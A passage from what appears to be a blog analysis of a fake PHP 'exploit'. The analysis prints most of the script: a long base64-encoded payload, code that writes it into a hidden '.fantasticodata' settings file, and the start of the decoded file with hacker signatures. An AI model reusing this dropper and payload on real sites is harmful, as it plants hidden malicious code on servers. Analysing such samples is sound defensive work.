NWVzaVk0VnJDdUltcjhFSlNoV1dlRjhSa3ZWUnZKbjVXQU4rcjhhdXNUV3lGeDdHMjZDbmplMDhiSmFZV2lTazZhcWcyN1A2WTFNam5MTEsvM2k5RGh4NWZSRjJXV0xobFFkam9Ea0FUczZvM21hV0tZYWlYSmM5c3FYRWFMREc2NUlkcnFSeEdRODhpc21UWGF6aE4xY3VTSVQ1M1hMME9nY3ovVTdackVOWHNiMjQvWW5nTnZLMDJJMXFrRmVWVC9NTHZ2bW1hZHBOVkovZUQ1bWlpbFcwQ3I3ektPRTNiOUZVbmh0K1lRRDRxSlMwaUpXeGlYT1gvYnZVaFNBLzIwNXFJMHAvb2RxTDBTNG4weFVuOFFoMDRLVVZaS2IwMEt4ajl2MmN5NjlpdFlJdVZQWHRSeW1CbS9UYktwbENZOFAvUUNLY3NERlh3bG53eU5JNC9qTXpldXlBUm5DV2pIZjg0VUF6eVdSRWt3UDBWVjNDUG1Nb21hM2lwZ2U3UUFZUDNlUHZUK2ZuK3lmRm5xTXZYMVJna3hNVVQyTVN1OHoyMlEyQS9EY3Q2Q1NsV255ZkZlWXB2bFN3enk0enJvQkFmdzBaSS9lWTlHOVpWTVpjOEhTY0xOVEkrN2xvejdyaUxYMUJ5R1dvejlqdWIwZWY4LzBHUG16R0czZTQ0Q0VKSlUxZkI3ODBpeEFWVEhpMitkcUJSRE8zUkxRVDVpWlQ2R1Z2dEV1OXE2VllPamxoTXY2QnhRczlQTXpTZUs1QzVTelozaTN2UEgwR0hrdVlGZmlad1dLWmxGTXNSaDg1Y2Vlb1RSeHo4SXRVYU9pa2QrclRBczExNXRWb29Gb3BxYm0yMW1QT1dYZDc3MFl4ZlEvaXgraDRmQmNCMWlYQXJVSWdwbDFwVGNEb3VVRHMybTEvelZudCsra2R5STVTcEpoSnQzRXI2SHMwZ2pyaThXS1M4V1YxVnNvRzdXQkNNTFRLMWMvNUJQZmZ6VnlFeUJPUnJrQ0g2V0l1a1NqQVFVWTNnVHA5czRMWmVlUmN1cllXOW9VYzlhdWE5anJjQ3hXV3pVVE1laDBzQU1PcHNzSktRTFcrWFNDZ3V0a3ZnSG9LdWdYMHYzeHNkV0xXTHV5bzhPcjhBWXV1QlRnMXFqYkZUWTRQTHJNQ2F6MER3bmNHSEVnb3FIMjNKVjFyRlRGYndnaDc4endrTGlvYnRvbnZ5MWw3MExPYnBiTldHUG9MbjdHMlh1dksrM3JpRGFLaFNXcW9zelMrVWxoWWdGQ3JGQUpPRjBhaElWMWZBY2VDbFpIb0hENUVHam9CbE5QQXdKYTJ5VUZrc3oxY1c4dGlWQ2NBWlBaZUx3VnloYU5reldJakRKTjgxbzVPRy9qWXpXUGtaTFVwZGw5R0I0UFhQampVd0M2NE52U2VieWVpWkkrV2NVcmY0Q0RTck5tM01qMkRCSGtaYWJNck1aUXZaUDk3VWM3bmYwWDJMNnRHbE1UcGRHZ04vY1JWWm9QNWVQZyszRHVCeThRMzRQVit0bHF1NVlQbzZUMStNUTd0SWFIRXFnVTJ1cW5kV3A0T3ZBODFxR3ZqSlFkK0lxOVNTckF1Tmh5eDZXVEVZVWVkR294RXVkS25STHVkZWQyaW5ldU1Cc1dKQjFCLzJHYVpCSVRzcGhTUWtoYXBUS1M4V3RUSTBSajJTQzBKWXFtcGFwWmhiZVkrN0prYU8zZ2ZiMVBQRi9FdzlYNHlqUS8wdW0wY0hoOVBKYW5sdm1TcXY3dU1WcFBicy9ubWNHRmk4eWhZQVBPZVBET0ovQWtsY3VUTHI2bjN0VmZWbFQ2K1hsbi9FRWlOVlJuMFRsYmI4bzVFOWxEY2RlczB6bURnRVZiblZCdmJseFU1MkJsMk9ZdzZHRHJSajI4bENncksycHN6bmxMZUt0Z1Q5UzhGTC9rMlpMMU55YVJHN1N1d3lOYmEzSkxRb04xL2hJL01mSEtpd3lxa3RMU3hnVWZKSFptOWdEU3lUOWIxYVhzRW5PSTlQUGw2ZVhHeWZRMTBBZkhZeFZndzBGMEdEYkJnSnNFRzUrbENBNzJpZHBraG5zUUQwZ2NBNVQ2SVhXL2dvbnBhSy9Wa0d4dnM3TkQ0eHF6QURHb0ZUQjZ2TWNiQi9WVHJoaXcySGh4a0FZTDVZQkFjdW9XZDB6VHpZVDI0bEFLaEZGaG13TmpUUjhCM2xlUGxpZjdnNE5rYVVXeS8yaHloUmtPcjZSK1dGL2xSUGtOODlTWTE1ZTZGSG5hL1VETE9CKy9GQlNWZW9RdStaSjY0TmpTYlB3K09CdWpNbUVJN2pJVTdNTkdseWRMNzdZZnNHOEZTMXBXSzF0RExUZFZzMXR1c0N2K0ZtTWVqd2g5QTVjTkM4VW9RRzVySFhHd0xDcVRnbHkwdUN1NGFJZHgzK051QnZFLzVRVnR2d3R3Ti91L0MzQjMvZzVpbHV3bG12SWUxbWdjSXdzdlQybkJ5NUxkeEZvT0NiUWtyZGJPaERZRnRBVWY5TXNSOG1PR2JEdE83TklBZjBuZDAxVjN4bzhqOUlGb002ajM3UkoyNDcvdXl0aW9reGNZTjZ4cWdaVWltRjVvQnh2cVFMbzBnWTFsQTVMelRqVE5JSkZpRkx4bWxjcTJBM01qTjBjTUdGRC8vQUFROU1adzZ0YVBWa1o2ZTJjVk03T2Q0dXpPR3pIN2pYZlZXYWI4VFpQRDZkQWpqQVp6aHgvcUpFM1VoYmQ5dHN0bmsxMGplV2wzQ2l3WVA0WFAyOThyYjRkUlg5WHZHaENzNHVsS2VKUE94a1Fua2xrVmVjaitTVnZiekZJTUZGbWVCOHNPQ2lUQkRkWnlqUEk3aTRHTW56Q0M0dCtmTnFHWDJaWW96aThnOTNlWEZaRmRxcnJ1akxaVXpUU3N1cXYxRmpmUjB6TkpFaDY3cTZZaTBYVjM2R1NxeGpDY3dJcFcrc0gvTUNtYkRicGFCRjJyeUJqRUtma1VIb3MrWFNDcnVpVUtTNnkrV2xaZlg2Y1gvcUNnT0hzYTRubTBLR01YSzJYRWJVZ1g0NE9CM0VEaWlGTjAzNjR3cmdGYjlJUVFqcmp0LzlBU0dBdjdOWkZHREwyYkVsL2xoakpUQVRoMEFtWFI3SGZzVnpJUTgvVUdaRHZqRkgydVdadU1mNGg3OUpnSGJIMGtZQi9FYW9FcmRTVHpoemtIU2NBQkd6ZnlXWDgvbnRWMFp5bWY1VlpoV29BVzZiNHZQMFdLRzNiK1U5WWNIN1dSd1RCOWpTMVRtcDFFSFdVQ0RMbVlqalFpMEVZSEFOSnBHamxIMzRQLzB0NVkvWXB4eXNrblRlSXZjZmJxSzRFeDh4RFNaZFdPbERGdFNKVFpnbUxvNGV5OHcrNWs4Z3Axa0VxRDJmVFNBaDVWYlNGQ1V3U2srMERTNWZSUDc3cWxMeWR3bkhiMnZIRjg4WXVMK0ZKZ1VjMzBGQ3VVanJvbkhHN2M4ZHZMQnRzOTBOT0h6dGpuRy9BczJ4dytmc0dvMXJ2VjN5ZFRhVGpobTRRQi9JNHVybFEvQ1RHQklFVzc4WCthUWRxNHdMcnd5dzY2ZlJaQjBtQ3pWK2txZUl1Y1lwNkNiK1RwSUp1S1BIU21nNkwvWWNaOFZtenpxVFhkVi9WYTVoWnArbWZkS05kd0xSSTV6ZVA3NHQzcmNGNWwxL1JDdGxXRTN2dGpkMnUxeGd5UlN5eFRGM0JTK2tZckhoWDFuSkF2bDlQeDhIdVpGOHhpSk5DQ2VxWk1wT2xzQStGajkyNHNqOFBWRnA2S0o3YXlLSXNQVkNybUJRNzhnWDVzVnd5YlpMVWNNSFQ0c0dkNWY1N2UrNUZZOG11Wlo3c2I1MkwybWFkNUFQZE9iZi8zN2NPZnRjQ2ducHJIMnpuL2RJQmU4UmkyWWtuckdYMU5ZdnMvSXpQT0tPU0kxNFVLd2V5VTNoTnhyTHprVzZ3aTl5NTF4OTBnVnowNTk5dzJMZUhDS1FxOUh6UU5rWitzQ2pGWFMyaU04b1p0N3AwSStOTythcTJoZzZydTBzSzMyYkhvRmJVUlc3dDlteEduZDQxemM0RWp5dWRPOE9zblNEdUdYZ3BlRzVGWFVOZmhCbWZEdERaNitMeU5Tem5KN2tSRFpQVGo3c2IzK0dETThyU2tuczdnNlBQVHlpaFUrTmNKcXE0SmJ2MzFoV2VuYlBSRFpvUjlNOWdQSUhoeTJqbXNuRHYvUDA3eUw5dTBUL2FrWDJvYkVQQmxDcXNBOVdxTVFURjlnSEsxMWl4Y3RsOXNFS2xGbUJNb01zTDdKMVFNOWd3blgxWDBTR3BEemorSW5WVFN5ejV0M2xIbmhOblora2N3dmVLVUd0SUtsSC9EWnhNQWFVVVNibmx5cGhxYXlYNm5JbGRaMnNWczJyS1FkTThacG9uR20xUi93aXpUd01jdGpWL0hucWUvS0wxWHdtNDkzUU9CbGpKUTBqSHE1RGpMVFFpdSs3VkhJRnpHYVhSZ0tBK0ZMTUo5d2F5ZTRTNFNjclNjSFJlak5DRkdiUDBBb3pUZThoalNlS2VKSEp1QlFyNDlLVU1wNUNJcGpCcnZFVTRpL20vV09KVDVMWS9EUVNlNEtzS2x3Znk3R3lLazhycTFTRjVGZEVUcENYZDNkd0pnUkFzaTQrUS9rZXIzMFRqcUkrVFMyckMwelVsVmhSVjZZVWRYVXhUZFRpWHZGOHRaSVBYNGZnM3puK1IwemFjbFlWbHpyaG5RZGMwT283SGlEUklWNTJ2Zm5hTzd0UGZSSzdMSmFGT3NrM2gvTUxOVm1aVUZsMlJYcHkyZmxnMlRuR0RIdnVzeHptRGgrQ0NPRm5GK2dtU1hJcGpUTXIrVTdkK1dJU1c3R0szYjE3Y1kwdVQrRWQ1RWVmbzVFaVhlYWF5VDFSdFRYaGNxdXh1bDE5VVRmaVgzaWVyeFFqMmkxZGh5N3B0NXk2bkdYWE1NK0pONFVLL1hhZjd2ZndsRDJadFJLcW9uaE5NbEdiQXJ3ckhENnVDalVudlJKMEpYdE1OU2g5bVpabVl6cDNETXNoTUZTVUxYMnNoZ1NwWkY2L0NwaUxhZ0FRdTVoQjFWUjhiREpnQUdvUkVqVlB5YVBaSlhXdGxKSmRWdGZLS2RrVmRhMlNrbDFWMTZvcDJmUHEybnhLOW9LNnRwQ1N2YWl1TGFaa0w2bHJTOG5aV2hIRVVrekpSN0dseUUwRHVXa3BndE5BY0ZxSzVEU1FuSllpT2cxRXA2WElUZ1BaYVNuQzAwQjRXb3IwTkpDZWxpSStEY1NucGNpdkJQSXJwY2l2QlBJcnBjaXZoSHFYSXI4U3lLK1VJcjhTeUsrVUlyOFN5SytVSXI4U3lLK1VJcjhTeUsrVUlyOFN5SytVSXI4U3lLK1VJcjh5eUsrY0lyOHl5Szhja0ovb25qS3luenZDOXpEVXNNT0srQWg2TmlQTlN4em92YUh1ak5VMS9pV1pzUjJ6N2pCUThTMFo5a2gzR20xMWpUNlNvZGI3anRWUjErZ2pEZGNZTWFWUU94ajJUS2dBL0pzRzA4Rkt3cjhwL0F4YlEzY0FETkZuTXR5NTJSK1k5TkRibXZjMUdmcWtNYkFKbG45SmhqeTI3emxhOFMwWmRzdHNjRmp4YmFMSzNKaTZNMWxqOEZHVk5JWFJscGJRZzhDL2FUNWtpYnpJVXFvZktaSW5LYWI1a2lKMll2aHZLa3lKWU5KOFNoRzdNL3czRmFaQ01HbStwWWdkRy82YkNqTlBNR2srUnNDaytSa0JrK1pyQkV5Nm5Ba20yT2ZGS3NpZVBYeUVndEFUTzVNQ2o3UVd3L1pLYXkxc3E3U1d3blpLYXlWc283UVdRbm1rdFE2R0gya3RnL0ZIV3F0Z0FKTFdJdjlFSVAvWElwRDRIcG9lbVhwRUY4MGVvL29ubFA4bmxQLy9lME1LNWYrZkMrVkQrU0MvY29yOHltaTRLZklyZy96S0tmSXJnL3pLS2ZJcmcvektLZklyZy96S0tmSXJnL3pLS2ZJcmcvektLZktyZ1B3cUtmS3JnUHdxS2ZLcmdQd3FLZktyZ1B3cUtmS3JvT2RMa1Y4RjVGZEprVjhGNUZkSmtWOEY1RmRKa1Y4RjVGZEprVjhGNUZkSmtWOFY1RmROa1Y4VjVGZE5rVjhWNUZkTmtWOFY1RmROa1Y4VjVGZE5rVjhWdTQ0VStWVkJmdFVVK1ZWQmZ0VVUrVlZCZnRVVStWVkJmdFdBL0dJNzZuTjY4SEZ5UjgwZWh2eW5uLzZubi82bm4vNm5uLzZubi82bm4vNm5uLzcxL1hUc2tpeGY5VlNTbDJXVlg3M05aWWF4U0JkQnhGNEMzR2gzYmJwUG1VUGllU0ExV0hNQVdOdmNPenJaOHVxdXNyY2E0ckRabzE0Nk5nQUFiQ2VmamgrRHJlWDAwN0VCQUdEYlBUc05ZL01XbzNuWkp5NDl6L05kRmZPeEs4L3pnWlhuOTg5ZGV1N3JqdDdWTXZscU5lL3ZIdWVKOGpxdGw1UzQxc3pYaE5OWW1ZL3M4SWpiNkFDbFdSckN5UHNpS29FVlorS29wSkFrYVY5YkxNa0Z2UG85bzJieVdqRmN3VkswZ2lXMkJsMWNXRmlnS3NXYVdLTmRlL0Z0RDlQdGVnanUyUk1QckpYNE0wNThNNnppdmROR2UySHBPNjIwcjY3eEgxQWgycC90bFpkMGZVMHFJT241RS9ka2NZMWVpTlhvaGNTOUZDREpwYVJkQ1pJcWlRRUw2WFpvWHc5V0FqVksxREdnVS8rMU5uelNacXNLRStKaXJCQVhwOTFzVlVyekNpNTdGSm4yV3RLM3AwbWtKSW5rRVN5bE9pcTY1Vi9hYWFjcXZ5dFpaUTZ2YTE2WmE5dGRreTdHWWxmU1BwWmdOWlpnbzIwMjd1cjJBMjQ2d3oyelhiSjZMUlB3UG02dHE3dDN3RThwbnlrTUhnWXI2QWJ4OFN2a3lrdFlLYlFIWGVBcFlSK2xpYXZBTlM3Z1JHVjg5QWEvMElzZGdUY1VwalhZZWFac1M3SEt0alNsc2kzODlaUnQ0VCt0YkF1cHUyNDlkUUlaL0Y3NDNHNThaVkxRa3R6ZkF1cHVyRlkxOGFYbGw5R3Bwem1xc3RnUVhnd3FEejNRNHAxV2lEeXJvbnBieHJHY0ducGxSUnkrNXUrc0ZJdjhuWldpZHdBaThvNjFmMXo3ajdoRTZPZm41dmpsWmw5VU9acjVBczJLSnp2bTVyd2I3NzZvMG8wRmZqN3RYc01MSi9oQmtTaWM2b2xhUHVJaGVFN3VnR0tiMXVQZXg0bDN4WEJGbWJxMzhobGpMeEhKTDN0NitqSGRQbUxsYWU2bXpQczJMZUVRUWZBVWdUanEwdWlBbUZmcHV5YWZld21xMWVPUEhoVFRMRlM2Wmg2dE5LeHRnVnZvLzRoUFJvMlQ3cjJJQkppVEZZQmRndjhrLzdnNFhZaVozc3JZdTlCTi9qQW93czIzRTIvT0srSE5lZTlXaTA5V2tESlhrUGdURU5xMFJ5QW10N1dXM3RaYWZGdHJMOXZXMmwra3JkblpRUDVDM2xPYXI4cWJMLzVRaGpidHFZenkvS1RtbzFjUzhscDg0N0VuRkVKTnh4T2g0YWkyZ2FNQ0tad3NSSWEwVVU0NmFaeDA0ampoSFJRR0hJOWxKRHEyampMU1QyT2tIOGRJbnpFaVhxOTdKRE5hSk5pSk1rT25jSlBaNGU4U2hCbml5Y0FTdmN3UnUxbjg2VWJQSDZmSUw4MG5jQlZyOU9XWE5mcnlYOFhvM2VjWi9hSXcrdmpqUWRxMDU0TW1HMzBsemVncmNVWmY4WTJlSG1aNE1hdXZwRmw5SmM3cUs1N1Z1L3FMMlh3bHplWXJjVFpmK1hVMlgwbTMrVXE4elZja202ZVhTS2F6K2NrNmsycnlsWGlUcjBnbVR4ZmVQODNVSzM4UlUwOCtSU1UvVzhFdUVKa2kySHZpMFN0TkRDRGp6MTVwMHg2K211ejNxK2xLVUkxWGd1ckwrdjNxWDBNWm9qcmdQWnVSU1FQQVJ6citZeHJDaHdPbFlxeUc4T1FYT2hFdHZXdVNwQ0R6OFFveTd5c0ltM1Y1a2w3TS83MzFBcDlQK1kvcEJaOUhLTVhQSTVTbXZvMWdvdWRZU0ZlTWhYakZXSGhaejdId1Y5VVFmTGxtNnJaL1lyaXBhVHplTENYY2tqRHRISUdtVFF3NHhZczdTYzN2dmNnVGFuOC8vV1VVWUhHYUN6RTBMUks5eHRlck5LRmVwWVI2bFFJZTd5K3BtTkxUUmY4cDN3U2RFbFBQK0RtUTB0UnpJQk45MDFLNmIxcUs5MDFMTCt1Ymx2NGl2dWx4ajN1OGUzcnphcng1NDBlN3BXbEh1eE5ERXZIZ1ZGTHplZzlTaGFjb2l5OFNsZEFxelYraFlSUGVHSCtzVVplZVo5UmlxQksvVUtwTnUxSTYrV3FlcE5aZVRHanR4UW10L1RLWCt2em56ZFZydWFlR0MyWGhqK05IbWFWcFI1bVBDQmZFUzJ1SmpaaTBxaEJZVnNDWE56Q1ZQWmJ3Uk92OWk2d3MvQWZhdVNUR2l2SDc2VXJ6djZDZFN4UGFPV0dsVUN2RnRuUDlPUTM5RjFrdWpMcHA3MUcrcVgzMWt6VkJqQTdqOTZHVmtqZWl4U05rRjBBcHFiY3dwZXRKZVVLY0xiMHUrRWRTaHJjaE03Z2I4eW02VXA1cUdGR0szejRWclYveStNaC9nakcrZm55RTlPNFBCYXBsOVpvMjNnajd4NXI2eEhFRnhDeC9QL2ZGZDJLVjR2ZjlsYWJkK0RjNXJxeE1Vc3BLa2xKV1lvWi9UOUhEeWt2cllXV1NIbGFTOUxEeTk5RERpSGNWTzVmK2M4NlY3L0V0eFVmQ3BXa2o0ZWM3MStva1BhNG02WEgxVnpqWDZrc3JkWFdTVWxlVGxMcjY5MURxUnlodDVabEt1OFNIYi9HeG9UWnRiUGg4cFoydzBLQWxyRFJvb2FVRzBGZ0tIWitqc0gvWmRRZitxT25UWGRzMG8wUStyYVBGeDR4YU1HWlUzK0hOM0FNRFR3cmhIc1NCM2VjYkV4ZUsvNHRhSSt0U3FUanQvQjZxZDFoaHhBTEVmUFRPeGNCN3dHR0ZlZUVsQ0hyNGVBcE5ZY0xGdTRCUkYyUjk0WGVjeHdteEhCVmlrZDViNG5LWm51ZlNORHdMN1U3Z0dHOWxWeWNvL3Q5RTZjV3NWbnpNcVMzK01xV1BScWUvU09lZkU1NytQVlc5L0Y5UzlUZnhxeTh0YzRBdm1lQWpEL3duZjl4aDJPL1l1dUg2Ti9lcTc1cTIwMlhIQUZpbXdoNUZXY1dtVmJhUE55OXVUcmRYdThQT3dBSmpHTXdoK0N5K2V4SGV4djZvWTFiODl2RDRuUVhsYVhjV3hNOFZNZlhONE5NaitMVTQvYTMydU55UWZuYXAxOVR3OUJKOHhKMWZFamRpc3hOTUwzMmVzVFJsRFBDWDFaSE1FWlFZSzBtblM0V3l4Sy81bEN1UDlKUFZxTEcvaEZwQnc1ZW5WS3RINFMzOUlyemxYNFMzOG92d1ZuOFIzdmxmaEhmaEYrRmRET09kMExmOUluVmYra1hWdzZkZ2ZnM2lYMldnMnEreVVPMVhtYWoycTJ4VVN6RFNUQ2IvUzN1OEtRS2xoSHN6Sm5lS1diOVgxRHNkZTFUREUxbk50QTE1UEZPNjNpSnl1OFVYbFlDK3FHdjBHYjdqSW5qMUFDU00ybGFqbmMyTUdGc3AxMlo4VVJFRzhPSkhHQzNIUXE5U1QwSkRRTWdmZmlZZzZveDdENVB3SUF5Z3dZOGtMRERnY2llaVFTREVnNThKaVBDczNDUThDQU5vOENNQnkrNzJ4U1FrQUFJNDROOEFDblk3eWJNdUpSR2I2OHJ4T3l2TDArNnNqRmxFOVc1dW9Hdmt2cWphRjVVRmRLQTUxZ0JiM0xzWlJIbjhOUTRUcmlTSjdvV1RvMlRIN1BLaDVzSmlQdE1lRFBCeDg2bm1jVlBmdE9uWURZNWVLejdqRGFwcG91MG5IZVRoUzFEbCtJMlY1V2szVnFaUGd4cVBlbFBKc0VjOURQTi96YnRLRlNaUjRMR05UenZHMW1LcHhKOTRqTm1COUIzblpSelRkZmxqbllnSHpCV1pjSFREc3JFaUFnSnI4OTNDdXlNeUNuN3lNVkVjVnJQWEFMLzdTSnd0Z2JTVmlyVStMYTkxZ2JjdThENnkyWmZpaDZ5eFJQQUZPN0FLSkpQQk11MUhYNElScWFFcXZhdXQrczhCUFY3OWwvZ0drbkxDaTJKODQyYUJ4bmRRK1NaOWpadlRLUWZqWGh5MDlnWktVMitZcTFlbVkrZzluZm0rMmRJYXlERnlSUUlPNXpPOVRMS0FLK3oxSm5hT3Z4NCt5NCt6YitrdHRKanFyZndueWZrNXJsTE1NejhobU1CVFA1RThQTkZWV3NDZGx3VnR1YVFsWDdtRVJlazUzTWZjYWNIckdkU3V3R082ZEpjQ2Uwd1hkU3l0SFJKbFRVOXNLVm5sbmE2MEhiTzVpcThMbjIrZlhXMmZmYzZjN3AzQzk4TWRCUG1EbnYxTnhzTWZFZFBYbEp4b3I5aUtTRE03L0wxZ1ZBZnhkRENiNGNrblhoZWlGYVVMSHg0bklId3hPbDlNUkloSHVuT1AxcXpvZ2Ntd1pyRm42UFB4S3NYZnFBOHBrMGlWRGtvL25pT3FRTnBlUzNJaXVqT080MG5LbFprS0pQT0Z1QXhiV0NuUUE5d1JCaG5OSjk4eHhVWVo2SFBNLzZMZldWejQrL3VkWDZES0NXeE8xR1VkT3I5eDF4NjZVL0kxVVlqaVFHOGlheDVBbURzcEF4aXNXNTNPK0gzWGFqaTJhemNIQmVpNXAyTjFNVFVBUklJc0trNWdNN0s0SXlYaWFpYjhuQVhUbzl0NTB2c1Vta3cyMlAyUmovY2NqNHpwUy9IOVVscUVGRjN5RFY1bmh6emowRnM4NmJpMmMzRmEyOWcvWGorNzhRWjhjdGI2K2ViK3ZwL3ppQ0hUTS8xVDVTL3BvTFJpOFI4UDlZK0gra3ZZK0YvTDl3MzcwM2krdjcxL2lwK2xaZTVKcGNsYTRTTm9tTWN1UEkwZFZPSjlDRThhVFdwRjhUNTEvTGtUbnZ3WEdFNXF4Zkl6dmFaV1ROL0ZDT09PY3N3V0RqdTRjOE5tcXQzV0czZW04eDRGTCt3NTRWVml1cXJpMFNxVXluL3FVWSttWTNkamEwQVpBU05sQ1MvaW1ZcXAzaDBzNEZzc1Q1UWg4OFFUVUxKbXAyTXJ4Tm0wdkVUZFpDWjBjU1ArWXBjMmxrcnN6c2JTV3FZUTNiYnpFTDc1NVdFZ0x1YXhPZ3BoYVpzTytqU2MveEUwMWpMUERGaXFmOUdBNWJsVE9mODkwNXM0SS91UC9ZWHNEd1dtSUl1S3VJWDAxd1FyNWVrSEpDOHhaZnQveXpMTFMzOWZ5NnpiK0J6dVA3YjUxKzBidGVuNnhtYkh0bzNIZDQ3QTdnNldVR05rWlBWUVJNeUJJMHdtSDcybFRjcVYrUWtrTDhOZ08zQmYzRGxZVy9hdW5nc1JMWVNJb2xFbTBxVE1DRW1lQ2hTZlBhK2E1bXpTQmdiZXphai8vcmQzWHlKODdiZllwKzNvL0FKRmY3OUZKakJpTXVwcmJMdUhkTWVxdE1DZkVhT2xvL0g1eDBOdnBDU0t1S2xGem1PS0VHZng4S2UyTzJnNVprd2hVWTI0VWllTzN1aVljb2tBbFBkZXpmUTdjUmZGUUNuK2NBNVAvaXNNbE1vVG83WHloRW1CbUxNZS9BMlVLVGQ3RzNXeFVKWjdOSFZOaSsvbXhWSkluVTlPWmZLTDBaVVFMek93RUNLbGdwdUNFRVR2dEVHOXFIL0tLTURMTXBLQlFDRkloODJleFZLSlRKcjVhZkdYd1U2b2REbDFIb1labzFHUFk4YkxDemdrUDFHK1FmaWZOY24vNHBya0pBMUlEUlpZZzNhU0ZhQVQwLzZoYTV2L1RxdVI1Zjh6cTVFVFo2MmU3SXovY2FtVERTcWpMQ2NlbDBoZkFIZ0ppMHVVQklQdUp5UHZ4eUNQdVFoNUNtbWtqbzllcW9OaEZTNGtWWGhRVDVFblprWkpzRlNnZ1oxRXRNcFR4aU9jN1dHWEhrZEtPL2szOFVDVFlUWFI5dUVqN2tBVEpQT05nOXBDaklma21VSC82Q1hpTGM3QVlpSGFhei9CTFM3OTR4Yi9jWXYvdU1XL1N0dzlTYTNqcjYyZmJzajE1OUNFS0NzSHJpSm8rRWxHNnM4RDBleFBtYjltVlJGekFnd2hzQktqbm94V1NEOUZJc2pnZk8va2s3SzFmckcrc1g2K2ZiN3lwVWNKOFBPUS9kbyszTjY4VUg1WGRzNU9qaFQwOFg2aWQ0TGNUMEtBTEQxalZaQWZzR0x2VGswZExRb0hwSHBPN25IVExLa3YyMDB4bzhBdmN5akhYK2JBa3g4eG8xQ3EvdUtkdkpOOGRTWDlHTDJXZWpjc2Y0VUIrMUN0VWwwSVRCVk1RcHpxdit2NDlCeTZCWWJkbVE1M0tXVjNRZlJJQ0NqbUYzVXRmUDdsMUtSRE5QZ1IzbkRnd1d3Q3dPWlROeDFVaWxQSEErVW54UU8vV3NYd2tZWG42VmpxMHhvV2YzWWsyeklIWmcvTTYyejc2T1JpdTdhK3RYV0dCdzMrVUpKeWxoVnA3MVBJbDA5aUtmVnlNKy94a2VuVi92K3FhajV0dTk2dlZzM1NjMVd6bEtxYUZDUFdudUVFUzZscTVwaGRlMkRXTUFobCtDMm5VVEQwVHM4Y0ZKemhWSFJTNTRRNEhiOGU4L1B6MDFWanFpTjRxVXFORnluMHJiNVo2S2ZydGdmWCtBOHErZE1Xa2w5S3lVOGQrMkg4NjdweXhDN3BRRmtybC85YlNoRDBiUC9WWmsyTUphZmVyVmZodDBTWDQ2OUM0c2s4Wkh6VWJRZHhpZ1NqQU50WmRVemplVjA2emFHa09rNHQvaEloLzFTbG0zSzFVZWJNYkF4aGhIQnZLbDF3UHM1WU1SL2ErdERGQnM4RXJncDZGS1dVdTdjeVI0Uy8xckVnUWFLaVdEM2xzOUxYRzNmWm5QSlZFYnN5bjBBODVUYWt6SWE5d3dnTmV6RDZzYUFKdnB2UHBWZEpvWGRJdGJTZ2lWdlF5TkE1TllZZGZXQXEyZmxxdFZ6TklTKzNacy9ZN3JXc252a0UydFVVMnVjZk94YVErcXdZSGFyaS9SQTZLa2V2VzVBOGZnS3QrUlJhcDV0bjI5aDhqdG1xZGZWQm8wMFVwZFoxVE5jZU9nM1RWYktuZTZmS083ekdUTXM5Z1l1RnA2cVdPM0JxanRrMzlVR2d3VGsvbFVLbFVNMC9tYXZGRks3V1FhbmJKc2pHaHVxN3lwM1Y2ZEJPbldscExLWFFPSUh4UFYyTlpQVmdJTzJ5TFdkN1c0Vjk1ZDdTb2ZJRHM5c0hSMDgxcHdwamZVdDVwVnJRQ3FXblZKamVpSmhvWlRpSE5ITDBmcExFUy9rNEJxYThZK2F2N25YVDNLNG5LZWltOVRGdTV1dE1KNnZIc1pEbWp6MFdJQTF0Uk53NytBdllTUFBNNnlnQVpkTUIrL1JNTnV5azV5dEtIU3c3eE5XVGpWWkw4OXkrV0VBbUZqaU9EdWhYbkZDUS9NT1R5S2M1YjQ5OGU5RHRnTEphQTh0MDQ4bHJoZms4dGt6bFNVeWtlZlY5M20raGQybDI3QkhqNkx2VnJ3Rkg0R2p4SnVwRVovb2tidEs4dTk4aWYyTEhWaHNhelpwaDRyVUp0YnFGYStHL3dLOXJhWTZkZFRmS2VnZUhuVVRUWTdIcnRrQTZEUk1DcWwvQlZXcFgwR3dxRzJQbHBHZnlrS3JkcjRFT216cmRkd0plcjlaQUk0dmpxL3AwV3lxbDlRZG5adE4wekY3RFZEYnRJVG5lb0VZbEJXT1N0TUxLSGJxSUtUSWVJS0NNU01qNDhYM1o5K2YwYitJOGZ1cVkwSjZkbmYyc1hBeWRPOHZkbXowYmRzeGI1ZDlpa2gwdmllWmZDeW9raXowNy9KS1owV2hVNk9yM2xsYXduZGJhRVg2akRUa1J3RmE3VVhDR2E3dDdtL0g1aUVnSDE5Qm82emovc0xiZE1lOGc3akVzbEIwdnNtdGl6RWZDSEZoZGN4bDRjNkFOREp5aW8rMjRtSnJOemJvRDNSbmc5enp1N1ZTK1F2MXNxY2Z6NU92Sk95SnBmQXdTMHRGZjRaYkFQOVpldi9yL0FRPT0nKSkpOwo/Pg==";  48: $open = fopen("../.fantasticodata/kanoodle_settings.php","w");  49: $handle = fwrite($open,base64_decode($trsm));  50: @fclose($open);  51: if($open){  52: echo"[+] Opening an Exploit File ... Done\n\n";  53: }else{  54: echo"[+] Can Not Open File Because You Don't Have a Permission or You Didn't Put Me in Main WebSite\n\n";  55: exit;  56: }  57: if($handle){  58: echo"[+] Building Exploit File ... Done \n\n";  59: echo"[+] Exploit Has Successfully Built \n\n";  60: }  61: ?>  62: </textarea></td>  63:         </tr>  64:     </table>  65: </div>  66: <p>&nbsp;</p>

The “exploit” starts by deleting the file “fantasticodata/kanoodle_settings.php” and then it creates a hidden directory with the name fantasticodata by placing a dot ‘.’ in front creating “.fantasticodata'” .

As someone can see at line 47 there is an interesting piece of code stored on trsm variable. The code is base64 encoded and it can be easily decoded using an online decoder tool. My choice these days is http://base64decode.org/ .

Placing the code in base64decode.org we can see the decoded version of it:

   1: <?php   2:  # ZaIdOoHxHaCkEr - r00t@dns.jo   3:  # Mavi1 ~ TurkisH-RuleZ TEAM   4:  